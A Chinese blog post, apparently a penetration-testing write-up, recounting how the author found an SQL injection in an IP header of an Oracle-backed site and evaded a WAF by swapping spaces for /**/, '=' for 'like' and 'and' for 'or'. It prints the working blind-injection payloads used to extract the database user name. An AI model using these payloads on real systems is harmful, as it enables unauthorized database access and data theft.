• 记录一次Oracle注入绕waf


        这个注入挺特殊的,是ip头注入。我们进行简单的探测:

    首先正常发起一次请求,我们发现content-type是76

        

     探测注入我习惯性的一个单引号:

    一个单引号我发现长度还是76

      

    我开始尝试单引号,双引号一起:

    我失败了长度还是76

      

    一般sql注入输入单引号一般长度都会有些变化。

      我记录深入探测,我输入'--%20

      

    返回了200,并且长度是0,这让我产生了一丝好奇。这里很有可能存在注入哦。

      我继续探测:

      输入--%20

      

    嘶!我不禁开始怀疑这里是不是本身就不存在安全问题呢?

      我都感觉像是数字类型了,很显然不是。。因为假设是数字类型注入输入'--%20会报错。

      那么究竟是什么问题呢?我觉得应该是过滤了注释符。过滤了--%20

      我开始换一种方式进行探测:

          我尝试输入'%20and%20'1'='1

      

    返回200,长度为空,并且没有报false的提示,我觉得有戏,我尝试输入'%20and%20'1'='2

      

    输出都一样。。。太坑了吧,这里我猜测可能过滤了and,也有可能过滤了空格

    我们先把空格用+代替显示:

    输入:'+and+'1'='1

      

    返回长度还是76,继续输入:

    '+and+'1'='2

    没任何变化。好了+号测试了不行,我们试试还有啥方法可以代替空格?

    输入'/**/and/**/'1'/**/=/**/'1:

    返回长度76,继续输入:

    '/**/and/**/'1'/**/=/**/'2

    返回长度还是76。。没任何变化。

    现在测试了三种方法,那么这里继续推测1.可能过滤了and 2.可能过滤了=号

    基于这两种过滤,我开始尝试把and 替换成or,把=替换成/**/

      再进行输入新的payload:

    '/**/or/**/'1'/**/like/**/'1

    oh!我感觉我有希望了,他终于返回了不一样的结果,接下来继续探测:

    输入:'/**/or/**/'1'/**/like/**/'2

    返回长度76,至此我可以很确认这是个sql注入。

    现在我们在理清下思路:

      1.使用like代替=

      2.使用/**/代替空格

      3.使用or代替and

      然后我们构造如下payload进行探测数据库user:

        '/***/OR/****/1/****/like/****/case/****/when/****/substr(user,1,1)/**/Like/***/'a'/**/then/**/1/****/else/****/exp(1111)/**/end/***/and/**/ '1'='1

        成功遍历出数据库第一位是J:

        

    然后我们依次往下遍历就是了就能得到完整的user内容。

    简单的演示下整个注入的过程。

    这次遇到的注入让我知道了,坚持就是胜利!

  • 相关阅读:
    git 学习
    公司领导写给新员工的信
    PLSQl远程连接oracle数据库
    hdu2222之AC自动机入门
    代码中添加事务控制 VS(数据库存储过程+事务) 保证数据的完整性与一致性
    ubuntu13.04安装SenchaArchitect-2.2无法启动的问题
    MVVMLight Toolkit在Windows Phone中的使用扩展之一:在ViewModel中实现导航,并传递参数
    面试题24:二叉搜索树与双向链表
    Struts2中的包的作用描述
    filter-mapping中的dispatcher使用
  • 原文地址:https://www.cnblogs.com/piaomiaohongchen/p/10158506.html
Copyright © 2020-2023  润新知